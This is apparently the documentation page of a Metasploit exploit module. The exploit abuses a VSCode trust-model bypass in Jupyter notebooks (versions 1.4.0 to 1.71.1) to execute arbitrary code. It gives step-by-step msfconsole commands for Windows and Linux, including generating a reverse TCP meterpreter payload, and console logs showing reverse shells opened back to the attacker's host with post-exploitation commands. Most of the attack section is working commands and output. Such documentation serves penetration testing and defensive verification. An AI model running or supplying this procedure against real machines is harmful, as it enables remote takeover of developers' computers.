## Vulnerable Application

VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.
On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed
HTML and javascript, which can then open new terminal windows within VSCode.
Each of these new windows can then execute arbitrary code at startup.

During testing, the first open of the Jupyter notebook resulted in pop-ups
displaying errors of unable to find the payload exe file. The second attempt
at opening the Jupyter notebook would result in successful execution.

Successfully tested against VSCode 1.70.2 on Windows 10 and Ubuntu 22.04.

### Install

From https://code.visualstudio.com/updates/v1_70

https://update.code.visualstudio.com/1.70.2/win32-x64-user/stable

https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable


## Verification Steps

### Windows
1. Install the application
1. Start msfconsole
1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
1. Do: `set lhost [ip]`
1. Do: `run`
1. In VSCode, open the URL (File -> Open -> Paste/type the URL)
1. After the pop-up errors, open the file again.
1. You should get a shell.

### Linux
1. Install the application
1. Start msfconsole
1. Do: `use linux/x64/meterpreter/reverse_tcp`
1. Do: `set lhost [ip]` and `set lport [port]`
1. Do: `generate -o shell.sh -f elf`
1. Copy the payload `shell.sh` to `/tmp/` on the target and run `chmod +x /tmp/shell.sh`
1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
1. Do: `set target 1 `
1. Do: `set lhost [ip]` and `set lport [port]` - be sure to set these to the same values as in the previous step
1. Do: `set FETCH_WRITABLE_DIR /tmp/`
1. Do: `set PAYLOAD_FILENAME shell.sh`
1. Do: `run`
1. Copy the ipynb, and payload file to the target machine.
1. In VSCode, open the file (File -> Open -> project.ipynb)
1. After the pop-up errors, open the file again.
1. You should get a shell.

## Options

## Scenarios

### VSCode 1.70.2 on Windows 10

```
resource (ipynb)> use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
resource (ipynb)> set fetch_srvport 9090
fetch_srvport => 9090
resource (ipynb)> rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.10.147:4444 
[*] Starting up web service...
[*] Using URL: http://192.168.10.147:8080/project.ipynb
[*] Sent project.ipynb to 192.168.10.100
[*] Sent project.ipynb to 192.168.10.100
[*] Sent project.ipynb to 192.168.10.100
[*] Sent project.ipynb to 192.168.10.100
[*] Sent project.ipynb to 192.168.10.100
[*] Sent project.ipynb to 192.168.10.100


[*] Sent project.ipynb to 192.168.10.100
[*] Sent project.ipynb to 192.168.10.100
[*] Sending stage (201798 bytes) to 192.168.10.100
[*] Sending stage (201798 bytes) to 192.168.10.100
[*] Meterpreter session 1 opened (192.168.10.147:4444 -> 192.168.10.100:56964) at 2024-03-21 12:38:13 +0000
[*] Meterpreter session 2 opened (192.168.10.147:4444 -> 192.168.10.100:56967) at 2024-03-21 12:38:14 +0000
^C[-] Exploit failed [user-interrupt]: Interrupt 
[*] Server stopped.
[-] rexploit: Interrupted
msf exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-Q0HUOEI
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > shell
Process 9632 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4170]
(c) Microsoft Corporation. All rights reserved.

C:\Users\h00die>code --version
code --version
1.70.2
e4503b30fc78200f846c62cf8091b76ff5547662
x64

C:\Users\h00die>
```

### VSCode 1.70.2 on Linux

```
msf exploit(multi/misc/vscode_ipynb_remote_dev_exec) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Starting up web service...
[*] Using URL: http://172.16.199.1:8090/project.ipynb
[*] Sent project.ipynb to 172.16.199.131
[*] Sending stage (3045380 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:60298) at 2024-05-13 09:56:36 -0700

^C[-] Exploit failed [user-interrupt]: Interrupt
[*] Server stopped.
[-] run: Interrupted
msf exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  3         meterpreter x64/linux  msfuser @ 172.16.199.131  172.16.199.1:4444 -> 172.16.199.131:60298 (172.16.199

msf exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer     : 172.16.199.131
OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
